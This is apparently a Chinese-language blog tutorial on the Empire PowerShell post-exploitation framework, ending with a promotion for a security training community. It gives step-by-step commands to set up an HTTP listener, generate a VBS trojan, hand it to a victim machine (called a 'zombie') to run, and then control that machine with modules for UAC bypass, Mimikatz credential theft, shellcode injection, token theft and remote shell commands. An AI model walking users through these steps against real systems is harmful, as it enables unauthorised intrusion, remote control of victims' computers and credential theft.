1、Empire工具介紹
Empire是一個PowerShell后期漏洞利用代理工具同時也是一款很強大的后滲透測神器,它建立在密碼學(xué)、安全通信和靈活的架構(gòu)之上。Empire實現(xiàn)了無需powershell.exe就可運行PowerShell代理的功能。快速部署后期漏洞利用模塊,從鍵盤記錄器到Mimikatz,并且能夠適應(yīng)通信躲避網(wǎng)絡(luò)檢測,所有的這些功能都封裝在一個以實用性為重點的框架中
2、Empire工具安裝
雖然滲透的目標(biāo)是windows,但Empire本身應(yīng)該是運行在linux平臺的,首先把程序目錄下載下來:
git clone EmpireProject/Empire
接著就轉(zhuǎn)進”Empire/setup”目錄,安裝./install.sh。
sudo ./install.sh
3、Empire工具的攻擊利用
執(zhí)行 sudo ./empire #執(zhí)行工具操作

執(zhí)行 listeners #進入監(jiān)聽列表

如果出現(xiàn)[!] Invalid listener name 那么先執(zhí)行 uselistener http 選擇http模塊 再執(zhí)行info 即可, 跳出就back

直接命令
set Name hacker
set Host http://192.168.1.14:443
設(shè)置完之后:

然后執(zhí)行: run #運行監(jiān)聽。 運行監(jiān)聽之后生成木馬。 如果沒有run 命令就用 execute 取代run命令

執(zhí)行:usestager 空格 然后Tab按鍵 會出現(xiàn)
bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy
Windows 就選擇 launcher_bat launcher_vbs 等。。 PHP 就選擇 hop_php
比如我選擇: launcher_vbs
執(zhí)行:usestager launcher_vbs 監(jiān)聽列表的名字 #這里就是hacker, hacker就是我剛剛設(shè)置的監(jiān)聽列表名字 (set Listener hacker)
然后執(zhí)行:info 查看設(shè)置配置,木馬腳本放在了 /tmp/launcher.vbs

然后執(zhí)行:execute #運行 生成木馬,生成成功 然后執(zhí)行: sudo chmod 777 /tmp/launcher.vbs #賦予可讀可寫權(quán)限 然后丟給肉雞運行

生成成功

然后查看肉雞列表 執(zhí)行命令: agents PS:如果你exit了 也就是退出了 你也可以直接執(zhí)行agents命令查看肉雞列表

如果要控制肉雞的話:
就執(zhí)行: interact 肉雞的名字

進入之后 執(zhí)行幫助 help 查看 肉雞控制器的命令
agents 跳躍的代理人的菜單
back 返回菜單
bypassuac 運行bypassuac,開創(chuàng)一個新的高完整性為監(jiān)聽代理。產(chǎn)卵<監(jiān)聽器>
clear 清除代理任務(wù)。
creds 從數(shù)據(jù)庫顯示/返回憑證。
download 任務(wù)代理下載文件
exit 任務(wù)代理退出
help 顯示菜單或語法for the help特定的命令。
info 顯示有關(guān)此代理的信息
injectshellcode listener shellcode inject進入偏遠的過程。前l(fā)istener米。injectshellcode<><>_ PID
jobs 返回工作或殺死一個正在運行的工作
kill 任務(wù)殺死特定進程名稱或ID.的代理
killdate 獲取或設(shè)置一個代理的killdate(01 / 01 / 2016)。
list 列出所有活動代理(或偵聽器)
listeners 跳轉(zhuǎn)到監(jiān)聽器菜單
lostlimit 任務(wù)代理更改丟失代理檢測的限制
main 回到主菜單
mimikatz 運行在客戶端- mimikatz Invoke
psinject inject發(fā)射器向遠程進程。例如,psinject > <名> < PID
pth 執(zhí)行一個credid PTH通過Mimikatz。
rename 重命名代理
revtoself 使用憑證/令牌還原令牌權(quán)限。
sc 需要截圖,默認(rèn)是PNG。給一個比率意味著使用JPEG。例SC [ 1 ]
scriptcmd 執(zhí)行在目前進口PowerShell腳本函數(shù)。
scriptimport 進口的PowerShell腳本保存在存儲器中的代理。
searchmodule 模塊搜索帝國名稱/描述。
shell 使用shell命令的代理任務(wù)。
sleep 任務(wù)代理睡眠間隔[抖動]
spawn 對于給定的聽眾產(chǎn)生一個新的帝國代理名稱。產(chǎn)卵<監(jiān)聽器>
steal_token 使用憑據(jù)/代幣冒充一個令牌的進程ID。
sysinfo 任務(wù)獲取系統(tǒng)信息的代理
updateprofile 更新代理連接配置文件
upload 任務(wù)代理上傳文件
usemodule 使用一個帝國的PowerShell模塊
workinghours 獲取或設(shè)置一個代理的工作時間
執(zhí)行肉雞命令: shell 你想執(zhí)行的系統(tǒng)命令

三、結(jié)束攻擊
如果你想刪除肉雞:
執(zhí)行:agents #查看肉雞列表

執(zhí)行:remove 肉雞名字

如果你想關(guān)閉監(jiān)聽:
首先執(zhí)行: listeners 查看監(jiān)聽列表

然后執(zhí)行: kill 監(jiān)聽列表的名字 結(jié)束掉進程

最后喜歡我文章的朋友請加圈子關(guān)注我們,私信關(guān)鍵詞:加群。(送免費資料和優(yōu)惠券)
就會自動分享給你群號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網(wǎng)絡(luò)安全技能一直是我們的初衷和愿景,讓我們共同成為守護信息世界的"SaFeMAN"。
還有可以關(guān)注我們微信公眾號,在公眾號上輸入安界網(wǎng),就可以關(guān)注到我們,領(lǐng)取資料和優(yōu)惠券!